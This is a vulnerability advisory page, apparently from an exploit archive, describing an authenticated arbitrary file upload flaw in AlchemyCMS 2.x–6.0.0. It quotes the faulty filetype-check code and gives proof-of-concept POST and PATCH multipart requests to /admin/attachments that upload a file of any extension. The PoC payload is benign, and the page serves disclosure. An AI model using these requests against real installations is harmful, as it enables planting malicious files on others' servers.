Alchemy CMS 6.0.0 Arbitrary File Upload

2021.10.13

Credit: Abdulrahman

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://alchemy-cms.com
# Software Link: https://github.com/AlchemyCMS/alchemy_cms
# Version: from 2.0 to 6.0.0
# Tested on: Linux ruby 2.6.8p205 rails 6
in /app/models/alchemy/attachment.rb line 82 :
def allowed_filetypes
Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
end
end
in /app/views/alchemy/admin/uploader/_button.html.erb in 18
configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>
POC :
POST /admin/attachments HTTP/1.1
------WebKitFormBoundarydAup7dA7ub3Weccp
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream
anything
------WebKitFormBoundarydAup7dA7ub3Weccp--
OR
id = 8 for old attachment
PATCH /admin/attachments/8 HTTP/1.1
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="_method"
patch
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream
anything
------WebKitFormBoundarylYnqNR9sxMPdw7Si--

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Alchemy CMS 6.0.0 Arbitrary File Upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.